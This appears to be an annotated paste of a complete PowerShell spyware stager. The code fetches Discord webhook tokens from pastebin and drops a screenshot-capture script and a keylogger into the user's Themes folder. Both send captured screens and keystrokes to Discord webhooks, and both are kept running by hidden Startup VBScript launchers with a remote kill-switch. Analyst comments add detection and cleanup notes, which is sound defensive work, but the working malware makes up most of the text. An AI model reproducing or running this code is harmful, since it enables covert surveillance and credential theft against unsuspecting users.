beigeworm

stagingpost

May 4th, 2024 (edited)
  # Analyst note: stager configuration. Two remote pastes are fetched immediately
  # (irm = Invoke-RestMethod) and their contents are used as Discord webhook tokens.
  # The third paste URL is only stored here; both dropped scripts poll it later.
  # Network indicators visible on this page: pastebin.com/raw/<id> and
  # discord.com/api/webhooks/<token>. Egress filtering or alerting on either from
  # powershell.exe / curl.exe covers every outbound call the script makes.
  1. # Webhook tokens are fetched at run time from remote pastes; $killurl is kept as a URL and polled later
  2. $screenwebhooktoken = irm 'https://pastebin.com/raw/c8fg78KU'
  3. $logwebhooktoken = irm 'https://pastebin.com/raw/STyjVHJR'
  4. $killurl = 'https://pastebin.com/raw/aNPVXCZQ'
  5.  
  6. # Base URL for the Discord webhook
  7. $webhookurl = 'https://discord.com/api/webhooks/'
  8.  
  9. # Construct the full webhook URLs by concatenating the base URL with the tokens
  10. $screenwebhook = $webhookurl + $screenwebhooktoken
  11. $logwebhook = $webhookurl + $logwebhooktoken
  12.  
  13.  
  # Analyst note: screen-capture stage, written to
  # %APPDATA%\Microsoft\Windows\Themes\ffmpeg.ps1 (listing lines 54-55).
  # The single-quoted here-string is not expanded in this script; it is written out verbatim.
  # Behaviour of the dropped file, as shown in the lines below:
  #   - if %TEMP%\ffmpeg.exe is absent, downloads an ffmpeg zip from gyan.dev into %TEMP%,
  #     extracts bin\ffmpeg.exe and deletes the zip and extracted folder
  #   - loops: ffmpeg "-f gdigrab -i desktop" writes %TEMP%\ScreenClip.jpg, curl.exe -F uploads it to $hurl
  #   - each iteration fetches $killurl; a response matching "kill" deletes ffmpeg.ps1 and exits
  #   - every status message uses the host name ($env:COMPUTERNAME) as the webhook username
  # Detection opportunities: ffmpeg.exe under %TEMP% launched with gdigrab arguments,
  # curl.exe form uploads to discord.com/api/webhooks, a .ps1 file inside the Themes directory.
  # NOTE(review): the kill branch removes only ffmpeg.ps1. No line here removes
  # %TEMP%\ffmpeg.exe or the Startup launcher, so those artefacts remain for cleanup.
  14. $scps1 = @'
  15.  
  16. $Path = "$env:Temp\ffmpeg.exe"
  17. If (!(Test-Path $Path)){  
  18. $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":hourglass: ``Downloading ffmpeg.exe. Please wait...`` :hourglass:"} | ConvertTo-Json
  19. Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
  20.    $zipUrl = 'https://www.gyan.dev/ffmpeg/builds/packages/ffmpeg-7.0-essentials_build.zip'
  21.     $tempDir = "$env:temp"
  22.     $zipFilePath = Join-Path $tempDir 'ffmpeg-7.0-essentials_build.zip'
  23.     $extractedDir = Join-Path $tempDir 'ffmpeg-7.0-essentials_build'
  24.     Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath
  25.     Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force
  26.     Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force
  27.     Remove-Item -Path $zipFilePath -Force
  28.     Remove-Item -Path $extractedDir -Recurse -Force
  29. }
  30.  
  31. $mkvPath = "$env:Temp\ScreenClip.jpg"
  32. if (Test-Path $mkvpath){
  33.     rm -Path $mkvPath -Force
  34. }
  35.  
  36. $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Taking Screenshots..`` :arrows_counterclockwise:"} | ConvertTo-Json
  37. Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
  38. while ($true){
  39.     .$env:Temp\ffmpeg.exe -f gdigrab -i desktop -frames:v 1 -vf "fps=1" $mkvPath
  40.     sleep 2
  41.     curl.exe -F file1=@"$mkvPath" $hurl | Out-Null
  42.     sleep 5
  43.     rm -Path $mkvPath -Force
  44.     $response = irm $killurl
  45.     if ($response -like "kill") {
  46.         rm -path "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1"
  47.         $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
  48.         Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
  49.         exit
  50.     }
  51. }
  52. '@
  53.  
  # Incident response: this header line is double-quoted, so $screenwebhook and $killurl are
  # expanded here and land as plaintext literals on the first line of the dropped file.
  # The full webhook URL and kill URL can therefore be recovered from disk.
  54. "`$hurl = '$screenwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Force
  55. $scps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Append -Force
  56.  
  # Analyst note: keystroke-capture stage, written to
  # %APPDATA%\Microsoft\Windows\Themes\update_check.ps1 (listing lines 126-129).
  # Assembly detail: the '@ on listing line 68 terminates $klps1, so $klps1 holds only the
  # opening of the inner $API here-string plus the DllImport signatures. The closing '@ for
  # the dropped file is written separately on listing line 128, followed by $klps2.
  # Behaviour of the dropped file, as shown in the lines below:
  #   - Add-Type P/Invoke of user32.dll GetAsyncKeyState, GetKeyboardState, MapVirtualKey, ToUnicode
  #   - polls virtual-key codes 8..254 on a 30 ms sleep and appends translated characters to $send
  #   - when the 10-second stopwatch lapses without a keypress, posts the buffer with a timestamp to $dc
  #   - fetches $killurl inside the 30 ms inner loop; "kill" deletes update_check.ps1 and exits
  # Detection opportunities: PowerShell script block logging (event ID 4104), where enabled,
  # records the Add-Type call with the GetAsyncKeyState import. Because the kill-URL fetch sits
  # inside the inner polling loop, the host sends frequent repeated requests to one
  # pastebin.com/raw URL, which is a distinctive network pattern.
  # Mitigation: PowerShell Constrained Language Mode restricts Add-Type, which this stage depends on.
  # NOTE(review): the kill branch removes only update_check.ps1. No line here removes the
  # Startup launcher, so that artefact remains for cleanup.
  57. $klps1 = @'
  58.  
  59. $API = @'
  60. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  61. public static extern short GetAsyncKeyState(int virtualKeyCode);
  62. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  63. public static extern int GetKeyboardState(byte[] keystate);
  64. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  65. public static extern int MapVirtualKey(uint uCode, int uMapType);
  66. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  67. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  68. '@
  69.  
  # $klps1 ended at the '@ above; $klps2 holds the remainder of the dropped script.
  70. $klps2 = @'
  71.  
  72. $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru
  73.  
  74. $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew()
  75. $KeypressThreshold = [TimeSpan]::FromSeconds(10)
  76. While ($true){
  77.  $keyPressed = $false
  78.    try{
  79.      while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) {
  80.      Start-Sleep -Milliseconds 30
  81.        for ($asc = 8; $asc -le 254; $asc++){
  82.        $keyst = $API::GetAsyncKeyState($asc)
  83.          if ($keyst -eq -32767) {
  84.          $keyPressed = $true
  85.          $LastKeypressTime.Restart()
  86.          $null = [console]::CapsLock
  87.          $vtkey = $API::MapVirtualKey($asc, 3)
  88.          $kbst = New-Object Byte[] 256
  89.          $checkkbst = $API::GetKeyboardState($kbst)
  90.          $logchar = New-Object -TypeName System.Text.StringBuilder          
  91.            if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) {
  92.              $LString = $logchar.ToString()
  93.                if ($asc -eq 8) {$LString = "[BKSP]"}
  94.                if ($asc -eq 13) {$LString = "[ENT]"}
  95.                if ($asc -eq 27) {$LString = "[ESC]"}
  96.            $send += $LString
  97.            }
  98.          }
  99.        }
  100.        $response = irm $killurl
  101.        if ($response -like "kill") {
  102.            rm -path "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1"
  103.            $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
  104.            Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
  105.            exit
  106.        }
  107.      }
  108.    }
  109.    finally{
  110.      If ($keyPressed) {
  111.      $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
  112.      $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss"
  113.      $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`'
  114.      $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json
  115.      Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
  116.      $send = ""
  117.      $keyPressed = $false
  118.      }
  119.    }
  120.  $LastKeypressTime.Restart()
  121.  Start-Sleep -Milliseconds 10
  122. }
  123.  
  124. '@
  125.  
  # Incident response: the header line is double-quoted, so the log webhook URL and kill URL
  # are expanded here and sit as plaintext literals on the first line of update_check.ps1.
  # The file is assembled in four writes: header, $klps1, a literal '@ terminator, $klps2.
  126. "`$dc = '$logwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Force
  127. $klps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
  128. "'@" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
  129. $klps2 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
  130.  
  131.  
  # Analyst note: persistence. Two VBScript launchers are written to the per-user Startup
  # folder (service.vbs and update.vbs). Each calls WScript.Shell Run with window style 0 to
  # start powershell.exe with -NoP -NonI -Exec Bypass -W Hidden -File against one dropped script.
  # Every path written by this page is under the user profile (%APPDATA%, %TEMP%).
  # Hunting: .vbs files created in ...\Start Menu\Programs\Startup by powershell.exe; a script
  # host (typically wscript.exe) spawning powershell.exe with "-Exec Bypass -W Hidden -File"
  # pointing into %APPDATA%\Microsoft\Windows\Themes.
  # Cleanup must cover both .vbs files as well as the two .ps1 files, because the remote kill
  # path in the dropped scripts deletes only the .ps1 files.
  132. $tobat = @'
  133. Set objShell = CreateObject("WScript.Shell")
  134. WScript.Sleep 500
  135. objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\ffmpeg.ps1""", 0, True
  136. '@
  137.  
  138. $pth = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\service.vbs"
  139. $tobat | Out-File -FilePath $pth -Force
  140.  
  141.  
  142. $tobat2 = @'
  143. Set objShell = CreateObject("WScript.Shell")
  144. WScript.Sleep 500
  145. objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\update_check.ps1""", 0, True
  146. '@
  147.  
  148. $pth2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"
  149. $tobat2 | Out-File -FilePath $pth2 -Force
  150.  
  151.  
  # Analyst note: posts an installation status message to the screenshot webhook, with the
  # host name as the webhook username. It then invokes both Startup .vbs launchers
  # immediately, so both stages start in the current session as well as at later logons.
  # The trailing "pause" waits for a keypress in the launching console.
  152. $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":white_check_mark: ``Persistance Installed!`` :white_check_mark:"} | ConvertTo-Json
  153. Invoke-RestMethod -Uri $screenwebhook -Method Post -ContentType "application/json" -Body $jsonsys
  154. sleep 1
  155. & $pth
  156. sleep 1
  157. & $pth2
  158.  
  159. pause